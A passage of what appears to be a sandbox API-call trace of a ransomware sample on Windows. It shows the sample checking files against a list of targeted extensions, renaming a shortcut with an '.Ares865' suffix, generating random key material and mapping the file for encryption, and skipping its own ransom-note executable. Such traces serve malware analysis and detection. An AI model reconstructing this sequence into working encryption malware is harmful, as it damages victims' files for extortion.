lstrcmpiW (lpString1="lnk", lpString2="zip") returned -1 [0067.543] lstrlenW (lpString="tgz") returned 3 [0067.543] lstrcmpiW (lpString1="lnk", lpString2="tgz") returned -1 [0067.543] lstrlenW (lpString="vbox") returned 4 [0067.543] lstrcmpiW (lpString1=".lnk", lpString2="vbox") returned -1 [0067.543] lstrlenW (lpString="vdi") returned 3 [0067.543] lstrcmpiW (lpString1="lnk", lpString2="vdi") returned -1 [0067.543] lstrlenW (lpString="vhd") returned 3 [0067.544] lstrcmpiW (lpString1="lnk", lpString2="vhd") returned -1 [0067.544] lstrlenW (lpString="vhdx") returned 4 [0067.544] lstrcmpiW (lpString1=".lnk", lpString2="vhdx") returned -1 [0067.544] lstrlenW (lpString="avhd") returned 4 [0067.544] lstrcmpiW (lpString1=".lnk", lpString2="avhd") returned -1 [0067.544] lstrlenW (lpString="db") returned 2 [0067.544] lstrcmpiW (lpString1="nk", lpString2="db") returned 1 [0067.544] lstrlenW (lpString="db2") returned 3 [0067.544] lstrcmpiW (lpString1="lnk", lpString2="db2") returned 1 [0067.544] lstrlenW (lpString="db3") returned 3 [0067.544] lstrcmpiW (lpString1="lnk", lpString2="db3") returned 1 [0067.544] lstrlenW (lpString="dbf") returned 3 [0067.544] lstrcmpiW (lpString1="lnk", lpString2="dbf") returned 1 [0067.544] lstrlenW (lpString="mdf") returned 3 [0067.544] lstrcmpiW (lpString1="lnk", lpString2="mdf") returned -1 [0067.544] lstrlenW (lpString="mdb") returned 3 [0067.544] lstrcmpiW (lpString1="lnk", lpString2="mdb") returned -1 [0067.544] lstrlenW (lpString="sql") returned 3 [0067.544] lstrcmpiW (lpString1="lnk", lpString2="sql") returned -1 [0067.544] lstrlenW (lpString="sqlite") returned 6 [0067.544] lstrcmpiW (lpString1="er.lnk", lpString2="sqlite") returned -1 [0067.544] lstrlenW (lpString="sqlite3") returned 7 [0067.544] lstrcmpiW (lpString1="rer.lnk", lpString2="sqlite3") returned -1 [0067.544] lstrlenW (lpString="sqlitedb") returned 8 [0067.544] lstrcmpiW (lpString1="orer.lnk", lpString2="sqlitedb") returned -1 [0067.544] lstrlenW (lpString="xml") returned 3 [0067.544] lstrcmpiW (lpString1="lnk", lpString2="xml") returned -1 [0067.544] lstrlenW (lpString="$er") returned 3 [0067.544] lstrcmpiW (lpString1="lnk", lpString2="$er") returned 1 [0067.544] lstrlenW (lpString="4dd") returned 3 [0067.544] lstrcmpiW (lpString1="lnk", lpString2="4dd") returned 1 [0067.544] lstrlenW (lpString="4dl") returned 3 [0067.544] lstrcmpiW (lpString1="lnk", lpString2="4dl") returned 1 [0067.544] lstrlenW (lpString="^^^") returned 3 [0067.544] lstrcmpiW (lpString1="lnk", lpString2="^^^") returned 1 [0067.544] lstrlenW (lpString="abs") returned 3 [0067.544] lstrcmpiW (lpString1="lnk", lpString2="abs") returned 1 [0067.545] lstrlenW (lpString="abx") returned 3 [0067.545] lstrcmpiW (lpString1="lnk", lpString2="abx") returned 1 [0067.545] lstrlenW (lpString="accdb") returned 5 [0067.545] lstrcmpiW (lpString1="r.lnk", lpString2="accdb") returned 1 [0067.545] lstrlenW (lpString="accdc") returned 5 [0067.545] lstrcmpiW (lpString1="r.lnk", lpString2="accdc") returned 1 [0067.545] lstrlenW (lpString="accde") returned 5 [0067.545] lstrcmpiW (lpString1="r.lnk", lpString2="accde") returned 1 [0067.545] lstrlenW (lpString="accdr") returned 5 [0067.545] lstrcmpiW (lpString1="r.lnk", lpString2="accdr") returned 1 [0067.545] lstrlenW (lpString="accdt") returned 5 [0067.545] lstrcmpiW (lpString1="r.lnk", lpString2="accdt") returned 1 [0067.545] lstrlenW (lpString="accdw") returned 5 [0067.545] lstrcmpiW (lpString1="r.lnk", lpString2="accdw") returned 1 [0067.545] lstrlenW (lpString="accft") returned 5 [0067.545] lstrcmpiW (lpString1="r.lnk", lpString2="accft") returned 1 [0067.545] lstrlenW (lpString="adb") returned 3 [0067.545] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0067.545] lstrlenW (lpString="adb") returned 3 [0067.545] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0067.545] lstrlenW (lpString="ade") returned 3 [0067.545] lstrcmpiW (lpString1="lnk", lpString2="ade") returned 1 [0067.545] lstrlenW (lpString="adf") returned 3 [0067.545] lstrcmpiW (lpString1="lnk", lpString2="adf") returned 1 [0067.545] lstrlenW (lpString="adn") returned 3 [0067.545] lstrcmpiW (lpString1="lnk", lpString2="adn") returned 1 [0067.545] lstrlenW (lpString="adp") returned 3 [0067.545] lstrcmpiW (lpString1="lnk", lpString2="adp") returned 1 [0067.545] lstrlenW (lpString="alf") returned 3 [0067.545] lstrcmpiW (lpString1="lnk", lpString2="alf") returned 1 [0067.545] lstrlenW (lpString="ask") returned 3 [0067.545] lstrcmpiW (lpString1="lnk", lpString2="ask") returned 1 [0067.545] lstrlenW (lpString="btr") returned 3 [0067.545] lstrcmpiW (lpString1="lnk", lpString2="btr") returned 1 [0067.545] lstrlenW (lpString="cat") returned 3 [0067.545] lstrcmpiW (lpString1="lnk", lpString2="cat") returned 1 [0067.545] lstrlenW (lpString="cdb") returned 3 [0067.545] lstrcmpiW (lpString1="lnk", lpString2="cdb") returned 1 [0067.546] lstrlenW (lpString="ckp") returned 3 [0067.546] lstrcmpiW (lpString1="lnk", lpString2="ckp") returned 1 [0067.546] lstrlenW (lpString="cma") returned 3 [0067.546] lstrcmpiW (lpString1="lnk", lpString2="cma") returned 1 [0067.546] lstrlenW (lpString="cpd") returned 3 [0067.546] lstrcmpiW (lpString1="lnk", lpString2="cpd") returned 1 [0067.546] lstrlenW (lpString="dacpac") returned 6 [0067.546] lstrcmpiW (lpString1="er.lnk", lpString2="dacpac") returned 1 [0067.546] lstrlenW (lpString="dad") returned 3 [0067.546] lstrcmpiW (lpString1="lnk", lpString2="dad") returned 1 [0067.546] lstrlenW (lpString="dadiagrams") returned 10 [0067.546] lstrcmpiW (lpString1="plorer.lnk", lpString2="dadiagrams") returned 1 [0067.546] lstrlenW (lpString="daschema") returned 8 [0067.546] lstrcmpiW (lpString1="orer.lnk", lpString2="daschema") returned 1 [0067.546] lstrlenW (lpString="db-journal") returned 10 [0067.546] lstrcmpiW (lpString1="plorer.lnk", lpString2="db-journal") returned 1 [0067.546] lstrlenW (lpString="db-shm") returned 6 [0067.546] lstrcmpiW (lpString1="er.lnk", lpString2="db-shm") returned 1 [0067.546] lstrlenW (lpString="db-wal") returned 6 [0067.546] lstrcmpiW (lpString1="er.lnk", lpString2="db-wal") returned 1 [0067.546] lstrlenW (lpString="dbc") returned 3 [0067.546] lstrcmpiW (lpString1="lnk", lpString2="dbc") returned 1 [0067.546] lstrlenW (lpString="dbs") returned 3 [0067.546] lstrcmpiW (lpString1="lnk", lpString2="dbs") returned 1 [0067.546] lstrlenW (lpString="dbt") returned 3 [0067.546] lstrcmpiW (lpString1="lnk", lpString2="dbt") returned 1 [0067.546] lstrlenW (lpString="dbv") returned 3 [0067.546] lstrcmpiW (lpString1="lnk", lpString2="dbv") returned 1 [0067.546] lstrlenW (lpString="dbx") returned 3 [0067.546] lstrcmpiW (lpString1="lnk", lpString2="dbx") returned 1 [0067.546] lstrlenW (lpString="dcb") returned 3 [0067.546] lstrcmpiW (lpString1="lnk", lpString2="dcb") returned 1 [0067.546] lstrlenW (lpString="dct") returned 3 [0067.546] lstrcmpiW (lpString1="lnk", lpString2="dct") returned 1 [0067.546] lstrlenW (lpString="dcx") returned 3 [0067.546] lstrcmpiW (lpString1="lnk", lpString2="dcx") returned 1 [0067.546] lstrlenW (lpString="ddl") returned 3 [0067.546] lstrcmpiW (lpString1="lnk", lpString2="ddl") returned 1 [0067.547] lstrlenW (lpString="dlis") returned 4 [0067.547] lstrcmpiW (lpString1=".lnk", lpString2="dlis") returned -1 [0067.547] lstrlenW (lpString="dp1") returned 3 [0067.547] lstrcmpiW (lpString1="lnk", lpString2="dp1") returned 1 [0067.547] lstrlenW (lpString="dqy") returned 3 [0067.547] lstrcmpiW (lpString1="lnk", lpString2="dqy") returned 1 [0067.547] lstrlenW (lpString="dsk") returned 3 [0067.547] lstrcmpiW (lpString1="lnk", lpString2="dsk") returned 1 [0067.547] lstrlenW (lpString="dsn") returned 3 [0067.547] lstrcmpiW (lpString1="lnk", lpString2="dsn") returned 1 [0067.547] lstrlenW (lpString="dtsx") returned 4 [0067.547] lstrcmpiW (lpString1=".lnk", lpString2="dtsx") returned -1 [0067.547] lstrlenW (lpString="dxl") returned 3 [0067.547] lstrcmpiW (lpString1="lnk", lpString2="dxl") returned 1 [0067.547] lstrlenW (lpString="eco") returned 3 [0067.547] lstrcmpiW (lpString1="lnk", lpString2="eco") returned 1 [0067.547] lstrlenW (lpString="ecx") returned 3 [0067.547] lstrcmpiW (lpString1="lnk", lpString2="ecx") returned 1 [0067.547] lstrlenW (lpString="edb") returned 3 [0067.547] lstrcmpiW (lpString1="lnk", lpString2="edb") returned 1 [0067.547] lstrlenW (lpString="epim") returned 4 [0067.547] lstrcmpiW (lpString1=".lnk", lpString2="epim") returned -1 [0067.547] lstrlenW (lpString="fcd") returned 3 [0067.547] lstrcmpiW (lpString1="lnk", lpString2="fcd") returned 1 [0067.547] lstrlenW (lpString="fdb") returned 3 [0067.547] lstrcmpiW (lpString1="lnk", lpString2="fdb") returned 1 [0067.547] lstrlenW (lpString="fic") returned 3 [0067.547] lstrcmpiW (lpString1="lnk", lpString2="fic") returned 1 [0067.547] lstrlenW (lpString="flexolibrary") returned 12 [0067.547] lstrcmpiW (lpString1="Explorer.lnk", lpString2="flexolibrary") returned -1 [0067.547] lstrlenW (lpString="fm5") returned 3 [0067.547] lstrcmpiW (lpString1="lnk", lpString2="fm5") returned 1 [0067.547] lstrlenW (lpString="fmp") returned 3 [0067.547] lstrcmpiW (lpString1="lnk", lpString2="fmp") returned 1 [0067.547] lstrlenW (lpString="fmp12") returned 5 [0067.547] lstrcmpiW (lpString1="r.lnk", lpString2="fmp12") returned 1 [0067.547] lstrlenW (lpString="fmpsl") returned 5 [0067.547] lstrcmpiW (lpString1="r.lnk", lpString2="fmpsl") returned 1 [0067.548] lstrlenW (lpString="fol") returned 3 [0067.548] lstrcmpiW (lpString1="lnk", lpString2="fol") returned 1 [0067.548] lstrlenW (lpString="fp3") returned 3 [0067.548] lstrcmpiW (lpString1="lnk", lpString2="fp3") returned 1 [0067.548] lstrlenW (lpString="fp4") returned 3 [0067.548] lstrcmpiW (lpString1="lnk", lpString2="fp4") returned 1 [0067.548] lstrlenW (lpString="fp5") returned 3 [0067.548] lstrcmpiW (lpString1="lnk", lpString2="fp5") returned 1 [0067.548] lstrlenW (lpString="fp7") returned 3 [0067.548] lstrcmpiW (lpString1="lnk", lpString2="fp7") returned 1 [0067.548] lstrlenW (lpString="fpt") returned 3 [0067.548] lstrcmpiW (lpString1="lnk", lpString2="fpt") returned 1 [0067.548] lstrlenW (lpString="frm") returned 3 [0067.548] lstrcmpiW (lpString1="lnk", lpString2="frm") returned 1 [0067.548] lstrlenW (lpString="gdb") returned 3 [0067.548] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0067.548] lstrlenW (lpString="gdb") returned 3 [0067.548] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0067.548] lstrlenW (lpString="grdb") returned 4 [0067.548] lstrcmpiW (lpString1=".lnk", lpString2="grdb") returned -1 [0067.548] lstrlenW (lpString="gwi") returned 3 [0067.548] lstrcmpiW (lpString1="lnk", lpString2="gwi") returned 1 [0067.548] lstrlenW (lpString="hdb") returned 3 [0067.548] lstrcmpiW (lpString1="lnk", lpString2="hdb") returned 1 [0067.548] lstrlenW (lpString="his") returned 3 [0067.548] lstrcmpiW (lpString1="lnk", lpString2="his") returned 1 [0067.548] lstrlenW (lpString="ib") returned 2 [0067.548] lstrcmpiW (lpString1="nk", lpString2="ib") returned 1 [0067.548] lstrlenW (lpString="idb") returned 3 [0067.548] lstrcmpiW (lpString1="lnk", lpString2="idb") returned 1 [0067.548] lstrlenW (lpString="ihx") returned 3 [0067.548] lstrcmpiW (lpString1="lnk", lpString2="ihx") returned 1 [0067.548] lstrlenW (lpString="itdb") returned 4 [0067.548] lstrcmpiW (lpString1=".lnk", lpString2="itdb") returned -1 [0067.548] lstrlenW (lpString="itw") returned 3 [0067.548] lstrcmpiW (lpString1="lnk", lpString2="itw") returned 1 [0067.548] lstrlenW (lpString="jet") returned 3 [0067.548] lstrcmpiW (lpString1="lnk", lpString2="jet") returned 1 [0067.549] lstrlenW (lpString="jtx") returned 3 [0067.549] lstrcmpiW (lpString1="lnk", lpString2="jtx") returned 1 [0067.549] lstrlenW (lpString="kdb") returned 3 [0067.549] lstrcmpiW (lpString1="lnk", lpString2="kdb") returned 1 [0067.549] lstrlenW (lpString="kexi") returned 4 [0067.549] lstrcmpiW (lpString1=".lnk", lpString2="kexi") returned -1 [0067.549] lstrlenW (lpString="kexic") returned 5 [0067.549] lstrcmpiW (lpString1="r.lnk", lpString2="kexic") returned 1 [0067.549] lstrlenW (lpString="kexis") returned 5 [0067.549] lstrcmpiW (lpString1="r.lnk", lpString2="kexis") returned 1 [0067.549] lstrlenW (lpString="lgc") returned 3 [0067.549] lstrcmpiW (lpString1="lnk", lpString2="lgc") returned 1 [0067.549] lstrlenW (lpString="lwx") returned 3 [0067.549] lstrcmpiW (lpString1="lnk", lpString2="lwx") returned -1 [0067.549] lstrlenW (lpString="maf") returned 3 [0067.549] lstrcmpiW (lpString1="lnk", lpString2="maf") returned -1 [0067.549] lstrlenW (lpString="maq") returned 3 [0067.549] lstrcmpiW (lpString1="lnk", lpString2="maq") returned -1 [0067.549] lstrlenW (lpString="mar") returned 3 [0067.549] lstrcmpiW (lpString1="lnk", lpString2="mar") returned -1 [0067.549] lstrlenW (lpString="marshal") returned 7 [0067.549] lstrcmpiW (lpString1="rer.lnk", lpString2="marshal") returned 1 [0067.549] lstrlenW (lpString="mas") returned 3 [0067.549] lstrcmpiW (lpString1="lnk", lpString2="mas") returned -1 [0067.549] lstrlenW (lpString="mav") returned 3 [0067.549] lstrcmpiW (lpString1="lnk", lpString2="mav") returned -1 [0067.549] lstrlenW (lpString="maw") returned 3 [0067.549] lstrcmpiW (lpString1="lnk", lpString2="maw") returned -1 [0067.549] lstrlenW (lpString="mdbhtml") returned 7 [0067.549] lstrcmpiW (lpString1="rer.lnk", lpString2="mdbhtml") returned 1 [0067.549] lstrlenW (lpString="mdn") returned 3 [0067.549] lstrcmpiW (lpString1="lnk", lpString2="mdn") returned -1 [0067.549] lstrlenW (lpString="mdt") returned 3 [0067.549] lstrcmpiW (lpString1="lnk", lpString2="mdt") returned -1 [0067.549] lstrlenW (lpString="mfd") returned 3 [0067.549] lstrcmpiW (lpString1="lnk", lpString2="mfd") returned -1 [0067.549] lstrlenW (lpString="mpd") returned 3 [0067.550] lstrcmpiW (lpString1="lnk", lpString2="mpd") returned -1 [0067.550] lstrlenW (lpString="mrg") returned 3 [0067.550] lstrcmpiW (lpString1="lnk", lpString2="mrg") returned -1 [0067.550] lstrlenW (lpString="mud") returned 3 [0067.550] lstrcmpiW (lpString1="lnk", lpString2="mud") returned -1 [0067.550] lstrlenW (lpString="mwb") returned 3 [0067.550] lstrcmpiW (lpString1="lnk", lpString2="mwb") returned -1 [0067.550] lstrlenW (lpString="myd") returned 3 [0067.550] lstrcmpiW (lpString1="lnk", lpString2="myd") returned -1 [0067.550] lstrlenW (lpString="ndf") returned 3 [0067.550] lstrcmpiW (lpString1="lnk", lpString2="ndf") returned -1 [0067.550] lstrlenW (lpString="nnt") returned 3 [0067.550] lstrcmpiW (lpString1="lnk", lpString2="nnt") returned -1 [0067.550] lstrlenW (lpString="nrmlib") returned 6 [0067.550] lstrcmpiW (lpString1="er.lnk", lpString2="nrmlib") returned -1 [0067.550] lstrlenW (lpString="ns2") returned 3 [0067.550] lstrcmpiW (lpString1="lnk", lpString2="ns2") returned -1 [0067.550] lstrlenW (lpString="ns3") returned 3 [0067.550] lstrcmpiW (lpString1="lnk", lpString2="ns3") returned -1 [0067.550] lstrlenW (lpString="ns4") returned 3 [0067.550] lstrcmpiW (lpString1="lnk", lpString2="ns4") returned -1 [0067.550] lstrlenW (lpString="nsf") returned 3 [0067.550] lstrcmpiW (lpString1="lnk", lpString2="nsf") returned -1 [0067.550] lstrlenW (lpString="nv") returned 2 [0067.550] lstrcmpiW (lpString1="nk", lpString2="nv") returned -1 [0067.550] lstrlenW (lpString="nv2") returned 3 [0067.550] lstrcmpiW (lpString1="lnk", lpString2="nv2") returned -1 [0067.550] lstrlenW (lpString="nwdb") returned 4 [0067.550] lstrcmpiW (lpString1=".lnk", lpString2="nwdb") returned -1 [0067.550] lstrlenW (lpString="nyf") returned 3 [0067.550] lstrcmpiW (lpString1="lnk", lpString2="nyf") returned -1 [0067.550] lstrlenW (lpString="odb") returned 3 [0067.550] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0067.550] lstrlenW (lpString="odb") returned 3 [0067.550] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0067.550] lstrlenW (lpString="oqy") returned 3 [0067.550] lstrcmpiW (lpString1="lnk", lpString2="oqy") returned -1 [0067.550] lstrlenW (lpString="ora") returned 3 [0067.551] lstrcmpiW (lpString1="lnk", lpString2="ora") returned -1 [0067.551] lstrlenW (lpString="orx") returned 3 [0067.551] lstrcmpiW (lpString1="lnk", lpString2="orx") returned -1 [0067.551] lstrlenW (lpString="owc") returned 3 [0067.551] lstrcmpiW (lpString1="lnk", lpString2="owc") returned -1 [0067.551] lstrlenW (lpString="p96") returned 3 [0067.551] lstrcmpiW (lpString1="lnk", lpString2="p96") returned -1 [0067.551] lstrlenW (lpString="p97") returned 3 [0067.551] lstrcmpiW (lpString1="lnk", lpString2="p97") returned -1 [0067.551] lstrlenW (lpString="pan") returned 3 [0067.551] lstrcmpiW (lpString1="lnk", lpString2="pan") returned -1 [0067.551] lstrlenW (lpString="pdb") returned 3 [0067.551] lstrcmpiW (lpString1="lnk", lpString2="pdb") returned -1 [0067.551] lstrlenW (lpString="pdm") returned 3 [0067.551] lstrcmpiW (lpString1="lnk", lpString2="pdm") returned -1 [0067.551] lstrlenW (lpString="pnz") returned 3 [0067.551] lstrcmpiW (lpString1="lnk", lpString2="pnz") returned -1 [0067.551] lstrlenW (lpString="qry") returned 3 [0067.551] lstrcmpiW (lpString1="lnk", lpString2="qry") returned -1 [0067.551] lstrlenW (lpString="qvd") returned 3 [0067.551] lstrcmpiW (lpString1="lnk", lpString2="qvd") returned -1 [0067.551] lstrlenW (lpString="rbf") returned 3 [0067.551] lstrcmpiW (lpString1="lnk", lpString2="rbf") returned -1 [0067.551] lstrlenW (lpString="rctd") returned 4 [0067.551] lstrcmpiW (lpString1=".lnk", lpString2="rctd") returned -1 [0067.551] lstrlenW (lpString="rod") returned 3 [0067.551] lstrcmpiW (lpString1="lnk", lpString2="rod") returned -1 [0067.551] lstrlenW (lpString="rodx") returned 4 [0067.551] lstrcmpiW (lpString1=".lnk", lpString2="rodx") returned -1 [0067.551] lstrlenW (lpString="rpd") returned 3 [0067.551] lstrcmpiW (lpString1="lnk", lpString2="rpd") returned -1 [0067.551] lstrlenW (lpString="rsd") returned 3 [0067.551] lstrcmpiW (lpString1="lnk", lpString2="rsd") returned -1 [0067.551] lstrlenW (lpString="sas7bdat") returned 8 [0067.551] lstrcmpiW (lpString1="orer.lnk", lpString2="sas7bdat") returned -1 [0067.551] lstrlenW (lpString="sbf") returned 3 [0067.551] lstrcmpiW (lpString1="lnk", lpString2="sbf") returned -1 [0067.551] lstrlenW (lpString="scx") returned 3 [0067.552] lstrcmpiW (lpString1="lnk", lpString2="scx") returned -1 [0067.552] lstrlenW (lpString="sdb") returned 3 [0067.552] lstrcmpiW (lpString1="lnk", lpString2="sdb") returned -1 [0067.552] lstrlenW (lpString="sdc") returned 3 [0067.552] lstrcmpiW (lpString1="lnk", lpString2="sdc") returned -1 [0067.552] lstrlenW (lpString="sdf") returned 3 [0067.552] lstrcmpiW (lpString1="lnk", lpString2="sdf") returned -1 [0067.552] lstrlenW (lpString="sis") returned 3 [0067.552] lstrcmpiW (lpString1="lnk", lpString2="sis") returned -1 [0067.552] lstrlenW (lpString="spq") returned 3 [0067.552] lstrcmpiW (lpString1="lnk", lpString2="spq") returned -1 [0067.552] lstrlenW (lpString="te") returned 2 [0067.552] lstrcmpiW (lpString1="nk", lpString2="te") returned -1 [0067.552] lstrlenW (lpString="teacher") returned 7 [0067.552] lstrcmpiW (lpString1="rer.lnk", lpString2="teacher") returned -1 [0067.552] lstrlenW (lpString="tmd") returned 3 [0067.552] lstrcmpiW (lpString1="lnk", lpString2="tmd") returned -1 [0067.552] lstrlenW (lpString="tps") returned 3 [0067.552] lstrcmpiW (lpString1="lnk", lpString2="tps") returned -1 [0067.552] lstrlenW (lpString="trc") returned 3 [0067.552] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0067.552] lstrlenW (lpString="trc") returned 3 [0067.552] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0067.552] lstrlenW (lpString="trm") returned 3 [0067.552] lstrcmpiW (lpString1="lnk", lpString2="trm") returned -1 [0067.552] lstrlenW (lpString="udb") returned 3 [0067.552] lstrcmpiW (lpString1="lnk", lpString2="udb") returned -1 [0067.552] lstrlenW (lpString="udl") returned 3 [0067.552] lstrcmpiW (lpString1="lnk", lpString2="udl") returned -1 [0067.552] lstrlenW (lpString="usr") returned 3 [0067.552] lstrcmpiW (lpString1="lnk", lpString2="usr") returned -1 [0067.552] lstrlenW (lpString="v12") returned 3 [0067.552] lstrcmpiW (lpString1="lnk", lpString2="v12") returned -1 [0067.552] lstrlenW (lpString="vis") returned 3 [0067.552] lstrcmpiW (lpString1="lnk", lpString2="vis") returned -1 [0067.552] lstrlenW (lpString="vpd") returned 3 [0067.552] lstrcmpiW (lpString1="lnk", lpString2="vpd") returned -1 [0067.552] lstrlenW (lpString="vvv") returned 3 [0067.552] lstrcmpiW (lpString1="lnk", lpString2="vvv") returned -1 [0067.553] lstrlenW (lpString="wdb") returned 3 [0067.553] lstrcmpiW (lpString1="lnk", lpString2="wdb") returned -1 [0067.553] lstrlenW (lpString="wmdb") returned 4 [0067.553] lstrcmpiW (lpString1=".lnk", lpString2="wmdb") returned -1 [0067.553] lstrlenW (lpString="wrk") returned 3 [0067.553] lstrcmpiW (lpString1="lnk", lpString2="wrk") returned -1 [0067.553] lstrlenW (lpString="xdb") returned 3 [0067.553] lstrcmpiW (lpString1="lnk", lpString2="xdb") returned -1 [0067.553] lstrlenW (lpString="xld") returned 3 [0067.553] lstrcmpiW (lpString1="lnk", lpString2="xld") returned -1 [0067.553] lstrlenW (lpString="xmlff") returned 5 [0067.553] lstrcmpiW (lpString1="r.lnk", lpString2="xmlff") returned -1 [0067.553] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Games\\GameExplorer.lnk.Ares865") returned 69 [0067.553] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Games\\GameExplorer.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\games\\gameexplorer.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Games\\GameExplorer.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\games\\gameexplorer.lnk.ares865"), dwFlags=0x1) returned 1 [0067.554] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Games\\GameExplorer.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\games\\gameexplorer.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0067.554] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=258) returned 1 [0067.554] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0067.554] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0067.555] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0067.555] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f00d8) returned 1 [0067.555] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0067.555] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0067.555] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x410, lpName=0x0) returned 0x154 [0067.557] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x410) returned 0x190000 [0067.558] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f00d8) returned 1 [0067.558] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0067.558] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0067.558] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0067.559] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0067.559] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0067.559] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0067.559] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0067.559] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0067.559] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0067.559] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0067.559] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0067.559] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0067.559] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0067.559] CloseHandle (hObject=0x154) returned 1 [0067.559] CloseHandle (hObject=0x12c) returned 1 [0067.559] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0067.559] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0067.559] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3240020 | out: hHeap=0x2b0000) returned 1 [0067.559] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4bba58c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4bba58c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0067.559] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0067.559] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4bba58c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4bba58c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0067.560] FindClose (in: hFindFile=0x2ccea8 | out: hFindFile=0x2ccea8) returned 1 [0067.560] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2548 [0067.560] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools") returned="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools" [0067.560] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1708 | out: hHeap=0x2b0000) returned 1 [0067.560] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, 